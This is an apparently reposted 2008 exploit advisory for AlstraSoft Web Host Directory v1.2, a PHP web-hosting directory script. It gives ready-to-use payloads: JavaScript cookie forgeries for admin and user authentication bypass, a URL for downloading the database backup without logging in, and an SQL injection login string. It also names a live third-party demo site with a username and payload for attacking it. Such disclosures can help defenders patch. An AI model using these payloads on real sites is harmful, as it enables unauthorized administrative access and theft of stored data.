Home / os / win10

webhostdir-sqlbypass.txt

Posted on 14 November 2008

============================================================================== _ _ _ _ _ _ / | | | | / | | | | / _ | | | | / _ | |_| | / ___ | |___ | |___ / ___ | _ | IN THE NAME OF /_/ \_ |_____| |_____| /_/ \_ |_| |_| ============================================================================== ____ _ _ _ _ ___ _ __ / ___| | || | | | | / _ | |/ / | | _ | || |_ | | | | | | | | ' / | |_| | |__ _| | | | | |_| | | . \n\____| |_| |_| \_| \___/ |_|\_\n ============================================================================== AlstraSoft Web Host Directory v1.2 Multiple Vulnerabilities ============================================================================== [»] Script: [ AlstraSoft Web Host Directory v1.2 ] [»] Language: [ PHP ] [»] Website: [ http://alstrasoft.com/webhost.htm ] [»] Type: [ Commercial ] [»] Report-Date: [ 14.11.2008 ] [»] Founder: [ G4N0K <mail.ganok[at]gmail.com> ] ===[ DTLZ ]=== [0] Insecure Cookie Handling [!] admin Auth bypass, panel => http://localhost/[paht]/admin/ [»] javascript:document.cookie = "adm=1"; [!] users Auth bypass [»] javascript:document.cookie = "logged=[username]"; javascript:document.cookie = "logged=g4n0k"; [1] Arbitrary Database Backup [!] we can download a Backup of Database. [»] http://localhost/[paht]/admin/backup/db [2] SQLi Auth Bypass [»] Username : [a_valid_username] [»] Password : ' OR ' 1=1-- ===[ LIVE ]=== [»] http://www.hyperstop.com/demo/webhost/ username: testtest password: ' OR ' 1=1-- javascript:document.cookie = "logged=testtest"; ===[ Greetz ]=== [»] ALLAH [»] Tornado2800 <Tornado2800[at]gmail.com> [»] Hussain-X <darkangel_g85[at]yahoo.com> //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) //ALLAH,forgimme... =============================================================================== exit(); ===============================================================================

 

TOP